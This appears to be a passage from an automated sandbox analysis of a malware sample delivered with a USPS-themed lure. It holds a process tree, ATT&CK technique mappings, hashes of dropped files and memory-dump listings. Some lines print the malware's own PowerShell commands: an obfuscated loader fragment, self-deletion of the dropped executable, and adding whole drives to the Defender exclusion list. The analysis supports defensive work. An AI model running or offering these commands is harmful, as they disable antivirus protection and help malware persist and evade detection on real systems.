([Convert]::$JWho($QGZMs[0])));$bMlkn=uHmlq (odcAj ([Convert]::$JWho($QGZMs[1])));fpxFE $bMlkn $null;fpxFE $RXJjA $null;
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3320);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\URzNA')
        11⤵
        
        PID:2732

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
210467c570048388f16a203107982d3e

SHA1
e26e209b715847f3b5f1510bdf2d4227fedb0e34

SHA256
d03989ffd49dd2a74ef1b19bcc169832fc887f817ade53b284a56b14443e7eec

SHA512
e6f2287ddd1089f3689a6d09b74b6ff5ce1f884548fab6417cbcdeb1dd62dec2329ec407f618b536b2feb56107a5041a57a674bdc58fc5f13eec58abec94176e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
291b2a83c5080eb1b9bc73f9696082b0

SHA1
18bd0b57c61874ba48a91aa745e3c975ed75dd32

SHA256
466c999aef6b74cc49dd9c73a201156860a5fcb5bf2f5a0f621596d9f92be174

SHA512
e89ced98f52e45ab93e0750276ebf33932f13394bad0550279bcee86a0c28a344b4d038b6aeab2fab3a4676bfe1f0717f109e29c0c3df9bce3b8b8ccfb21fe80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
4c1ae2b9d781f36c39fe82073b8df214

SHA1
cf5c20e800defc5a2358bfb4f579afba40c934ac

SHA256
e8c51febf85e9817bcd5cf47e98e6acd53861ef7abef163ea2be8a7e19347433

SHA512
d0e8b41acf57b905902e87dcb8b4615330c53d249e513041a257068672308943462fe769a25078d34b7f781f9cdd0f4b056b6775c24707bb2edc628a96fb0169

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
4c1ae2b9d781f36c39fe82073b8df214

SHA1
cf5c20e800defc5a2358bfb4f579afba40c934ac

SHA256
e8c51febf85e9817bcd5cf47e98e6acd53861ef7abef163ea2be8a7e19347433

SHA512
d0e8b41acf57b905902e87dcb8b4615330c53d249e513041a257068672308943462fe769a25078d34b7f781f9cdd0f4b056b6775c24707bb2edc628a96fb0169

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
10KB

MD5
2494e58c68ff84fa4877d87410ca1131

SHA1
e3e4b2743e6efd3839917fb05506d6b8bb6da50f

SHA256
e2b41aff488af5532a02ad44883e3d0c6eb4c7c980b28cb3a57af4f1f28c9f1b

SHA512
14890efb20d172194c61d12876f8b4432577a7c398702aa9a9033c0acafaf0f603d74e269142c2a98742cb938c518b1261240e3bbe1e57b2961d70468b40cac8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
fc2f20300da733a3240b286fffe9fe64

SHA1
0fedff4911fede407567360340cc4dc4495f9a12

SHA256
21ad5456bc18f2ba28193b755cc87b37ec115621e0a6124dcac24a016a773711

SHA512
162f6aa00748f0b73027ca8286605038b79819e254ff336b2dce83f78a4d2ab13aa33765ddcba50f85edc2d0c7266a887ed3a3d8474264c0dd971c258848e1ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4656e58a2418c8ae0cfb2782850576b9

SHA1
2ffd511db1e9f861d6be40d8782921ed83fca12c

SHA256
598485a2e6c80c3dd7800f20b5b04341b526734901168869bd8c75b8556f1e2e

SHA512
24575aa840de3c76dbd73e9266a154402d53929df3adbe8380fa4db6f371a41eed99d476c4b248c941b60529a947a630a251ec3cefa42a64efe551ea6b94508e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
8de7604c6df2fef2f7e4566b82a2cb67

SHA1
b7ebe838e49f8c854a1ffeaf763a573a4b0ad19c

SHA256
6a6f78787aab5071892dfcbebf77cdd3e70527430b920c3f394a02828ac15eb7

SHA512
53bbc8a5f963b564f692418617edd09b26a3f11648cf64e1b804d42f420aeb848c8739466c701d4a675eb6c6f28e3cedb6a91b003b1081670155e52ceafbcade

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
10KB

MD5
6d2966e3ef89343ecaabc1c76fae15b5

SHA1
d84378cf8e2dcd23a391cbb5e754f65a82c35e71

SHA256
c9919b16b419a666d2104a58ba32688aeff3eececc7efa17e9af54f95739804d

SHA512
28b4df0eea890a71603171dd2bd28abc3ca1bdad489aa8ff85f0f01c097e91a61500ecb8d69dfa6c8421537d33f8988dae212a78f240fbfc2483e6676f0ba759

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1200d39dc04f6a983a3402ea6e431932

SHA1
f28745b36e8dd0011538a7067c68bdf8a3198f53

SHA256
b81eadfe3e526def91fb85fd4c229ab2850e544c2a8e42e0354785b64da44716

SHA512
3f8f988dd947209b8e310230de80b7da56f206d92c6224be09eff768d6451c3709ffb1cb3d261de7494c69aa218c5fbe2df2ea8ee24bd98016bd077ed09291da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
6f71cd30782ad3d18ce5aebbec173164

SHA1
143af9455363f2402eaa68edd4f13d9b3606bd43

SHA256
d796334b4558f640a2a27d0c4a5e3c2fee787007d39d29be5967d4b14ba8ee53

SHA512
b31fe5c80e67181a0fd92386bc2b4df5204bb9576ed2902dde26e7244c386d2639a7767bd60cb5e7ec00ebb0feb9131197f55e7225253e102e92db181bada0c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
77437112950ee4f2328c153053e6e1a9

SHA1
afaee7c30249e852666390bd0346f3642badf31d

SHA256
b80a868d7adad4d98a09dda161327b5388203da24a4f7190756cd255663a70cf

SHA512
053b506b352b2fdb8079299d06ea315f8f6fbdcae6073e2bdf9b60fa2d6a1f99a899f741eef38db048a1d34bffa5fc8c7bb6c7cc4a7bd32f37c0a76c97f712d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
77437112950ee4f2328c153053e6e1a9

SHA1
afaee7c30249e852666390bd0346f3642badf31d

SHA256
b80a868d7adad4d98a09dda161327b5388203da24a4f7190756cd255663a70cf

SHA512
053b506b352b2fdb8079299d06ea315f8f6fbdcae6073e2bdf9b60fa2d6a1f99a899f741eef38db048a1d34bffa5fc8c7bb6c7cc4a7bd32f37c0a76c97f712d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
10KB

MD5
b9251ae824b4604a7a3435271f77fc55

SHA1
04fecb5e6a35e9bcba54ed508cd6cbaa66570ba9

SHA256
f81e71c399f97d75e9f919416e3f6c5f7c379cecc08149279d588f0078d3e7dd

SHA512
4f3b020a34a1d4f178ad6de7ecfb6efde07a54d07470488bbf3aa12a3d9ed00e7252d19ef42d79f6fa437445fe5c062e610f2d470a9c9b7fbe53746282784486

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
9cf5bcdc6a2ff4be000e1638b6f02b52

SHA1
1402a9929e0503112073e536ccb9c620d0de3b73

SHA256
fb7f825241161ca6212a88431266192d69283a0c4b1a7f53ba877f07fdcc6d0b

SHA512
8be4756faaddabbda3176414ca82355e253b98be3252d2125f1f6738e4f5b2e82096f4a916bf4d199992e6330d3869ad740fa06efc7b2cf52d30e914535b8077

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a7e94fdaad3bac06e4556ced001c808d

SHA1
3fe59b8bd32acf74f6972896a19abf6de2bc28b3

SHA256
416f8ccdfb5c7eafbf0f14cf784636877564b83fcd29333de41d4f9f62039e13

SHA512
6674bdd0bed255927a0c5e07099be7515f82e2a433c652eacc2bd67acb580d15d6fa707ae079c6d4781d5065e9c3fdaca5b447dfcf0a3dea91b214e5ee387ad7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Fwd_USPS_Expected_Delivery_on_Monday_20231111.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpaxr3x5.4x3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wofhho.bat

Filesize
256KB

MD5
8e8ac6242966a2ed76cd99a227fb6e3d

SHA1
4ee912b09c53b7cc70eae0ce413ae68a84060a99

SHA256
b22318db5d16368ad8e3d72614c1bd932fcebf1d233268e1d5db70badfb42ef9

SHA512
72f302fedd9d0f888ef0e25a43b07e275544c377d8a08950c625a57ea322cb6dc7925c34a6ec6075d87d76f6fc35af5351cab769e848496aab82640a2b6f8c31

Download Submit
C:\Users\Admin\AppData\Local\Temp\wofhho.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\wofhho.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\JBrYt.bat

Filesize
235KB

MD5
fb5791ff7ad2148b8df7a4e351e46842

SHA1
55b68f7462e2c034ad3220b1096578c9a8697a34

SHA256
f590b5d9c60f27f88ee136632a4b34d037ff271dc55275b4cff859bd48eb06f2

SHA512
8f42f02f8c09c35f491b62ed30e26ae413c9a9c2e20d473bb8d8724f1446f95a62a1e91d77e7d0abfd0053f9fa26f2080bfbf9df5123f81f5768c543c9b8a790

Download Submit
C:\Users\Admin\AppData\Roaming\JBrYt.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\JBrYt.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\JBrYt.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\JBrYt.vbs

Filesize
143B

MD5
48fa04a7281e11294cf2b901cf6d7b45

SHA1
97bedcdaaa808710c2c7968790e7bdca1dfc7bf9

SHA256
16832a6783697bc33739eff684276b8169dbe285b3774a2ae40fd9849ddc7014

SHA512
e727c6ce385b829783baf528cc0d53596370ec71ac77ad431df7a3a82a0d618be5b309b3f9043f2d9f3cf03020949c440f7d42f3f0520b0171c953584188e8ed

Download Submit
C:\Users\Admin\AppData\Roaming\URzNA.bat

Filesize
256KB

MD5
8e8ac6242966a2ed76cd99a227fb6e3d

SHA1
4ee912b09c53b7cc70eae0ce413ae68a84060a99

SHA256
b22318db5d16368ad8e3d72614c1bd932fcebf1d233268e1d5db70badfb42ef9

SHA512
72f302fedd9d0f888ef0e25a43b07e275544c377d8a08950c625a57ea322cb6dc7925c34a6ec6075d87d76f6fc35af5351cab769e848496aab82640a2b6f8c31

Download Submit
C:\Users\Admin\AppData\Roaming\URzNA.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\URzNA.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\URzNA.vbs

Filesize
133B

MD5
fdc711e8ded91cf14bcc5130cd303fd1

SHA1
09601b6e31b0216b467936aef9a0435cecb043a3

SHA256
e2ecec93d72709748c069fc36042d34b1ae79211eec3556b189627afee501336

SHA512
0b9d4d8636d63fbed8a0617c9023cac7557a374a98a070fe039324da8a1a78b7fe28efaa2b5fe4a1d579cf6a5807397907e7023295ed9236487c1e9ea047999c

Download Submit
memory/940-362-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/940-363-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/940-364-0x0000000070FA0000-0x0000000070FEC000-memory.dmp

Filesize
304KB

Download
memory/940-374-0x000000007F500000-0x000000007F510000-memory.dmp

Filesize
64KB

Download
memory/1064-262-0x0000000070FA0000-0x0000000070FEC000-memory.dmp

Filesize
304KB

Download
memory/1064-258-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/1064-259-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/1064-272-0x000000007FB90000-0x000000007FBA0000-memory.dmp

Filesize
64KB

Download
memory/1764-142-0x000001C275990000-0x000001C2759B2000-memory.dmp

Filesize
136KB

Download
memory/1764-144-0x000001C275A50000-0x000001C275A60000-memory.dmp

Filesize
64KB

Download
memory/1764-143-0x000001C275A50000-0x000001C275A60000-memory.dmp

Filesize
64KB

Download
memory/2000-243-0x000000007EE30000-0x000000007EE40000-memory.dmp

Filesize
64KB

Download
memory/2000-232-0x0000000070FA0000-0x0000000070FEC000-memory.dmp

Filesize
304KB

Download
memory/2000-229-0x0000000003030000-0x0000000003040000-memory.dmp

Filesize
64KB

Download
memory/2000-231-0x0000000003030000-0x0000000003040000-memory.dmp

Filesize
64KB

Download
memory/2000-228-0x0000000003030000-0x0000000003040000-memory.dmp

Filesize
64KB

Download
memory/2944-378-0x0000000007230000-0x00000000072CC000-memory.dmp

Filesize
624KB

Download
memory/2944-381-0x0000000007CF0000-0x0000000007D82000-memory.dmp

Filesize
584KB

Download
memory/2944-376-0x00000000023E0000-0x00000000023F0000-memory.dmp

Filesize
64KB

Download
memory/2944-375-0x00000000023E0000-0x00000000023F0000-memory.dmp

Filesize
64KB

Download
memory/2944-313-0x00000000023E0000-0x00000000023F0000-memory.dmp

Filesize
64KB

Download
memory/2944-312-0x00000000023E0000-0x00000000023F0000-memory.dmp

Filesize
64KB

Download
memory/3136-207-0x0000000006F90000-0x0000000006FAE000-memory.dmp

Filesize
120KB

Download
memory/3136-211-0x0000000007360000-0x000000000736E000-memory.dmp

Filesize
56KB

Download
memory/3136-194-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
64KB

Download
memory/3136-210-0x00000000073B0000-0x0000000007446000-memory.dmp

Filesize
600KB

Download
memory/3136-208-0x000000007FA30000-0x000000007FA40000-memory.dmp

Filesize
64KB

Download
memory/3136-212-0x0000000007470000-0x000000000748A000-memory.dmp

Filesize
104KB

Download
memory/3136-215-0x0000000007450000-0x0000000007458000-memory.dmp

Filesize
32KB

Download
memory/3136-209-0x00000000071A0000-0x00000000071AA000-memory.dmp

Filesize
40KB

Download
memory/3136-193-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
64KB

Download
memory/3136-195-0x00000000025B0000-0x00000000025C0000-memory.dmp

Filesize
64KB

Download
memory/3136-196-0x0000000006FD0000-0x0000000007002000-memory.dmp

Filesize
200KB

Download
memory/3136-197-0x0000000070FA0000-0x0000000070FEC000-memory.dmp

Filesize
304KB

Download
memory/3332-192-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

Filesize
64KB

Download
memory/3332-311-0x0000000008180000-0x0000000008724000-memory.dmp

Filesize
5.6MB

Download
memory/3332-299-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

Filesize
64KB

Download
memory/3332-257-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

Filesize
64KB

Download
memory/3332-309-0x0000000006E60000-0x0000000006E82000-memory.dmp

Filesize
136KB

Download
memory/3332-260-0x0000000002FA0000-0x0000000002FB0000-memory.dmp

Filesize
64KB

Download
memory/3440-171-0x0000000005FF0000-0x000000000600A000-memory.dmp

Filesize
104KB

Download
memory/3440-168-0x0000000005A30000-0x0000000005A4E000-memory.dmp

Filesize
120KB

Download
memory/3440-154-0x0000000004720000-0x0000000004730000-memory.dmp

Filesize
64KB

Download
memory/3440-214-0x0000000004720000-0x0000000004730000-memory.dmp

Filesize
64KB

Download
memory/3440-169-0x0000000004720000-0x0000000004730000-memory.dmp

Filesize
64KB

Download
memory/3440-155-0x0000000004B60000-0x0000000004B82000-memory.dmp

Filesize
136KB

Download
memory/3440-156-0x0000000004C00000-0x0000000004C66000-memory.dmp

Filesize
408KB

Download
memory/3440-213-0x0000000004720000-0x0000000004730000-memory.dmp

Filesize
64KB

Download
memory/3440-242-0x0000000004720000-0x0000000004730000-memory.dmp

Filesize
64KB

Download
memory/3440-152-0x0000000004D60000-0x0000000005388000-memory.dmp

Filesize
6.2MB

Download
memory/3440-151-0x0000000002210000-0x0000000002246000-memory.dmp

Filesize
216KB

Download
memory/3440-170-0x0000000007260000-0x00000000078DA000-memory.dmp

Filesize
6.5MB

Download
memory/3440-157-0x0000000004CD0000-0x0000000004D36000-memory.dmp

Filesize
408KB

Download
memory/3440-153-0x0000000004720000-0x0000000004730000-memory.dmp

Filesize
64KB

Download
memory/3452-336-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/3452-380-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/3452-379-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/3452-337-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/3752-338-0x00000000025E0000-0x00000000025F0000-memory.dmp

Filesize
64KB

Download
memory/3752-350-0x00000000025E0000-0x00000000025F0000-memory.dmp

Filesize
64KB

Download
memory/3752-349-0x000000007FC40000-0x000000007FC50000-memory.dmp

Filesize
64KB

Download
memory/3752-339-0x0000000070FA0000-0x0000000070FEC000-memory.dmp

Filesize
304KB

Download
memory/4936-292-0x00000000045F0000-0x0000000004600000-memory.dmp

Filesize
64KB

Download
memory/4936-291-0x00000000045F0000-0x0000000004600000-memory.dmp

Filesize
64KB

Download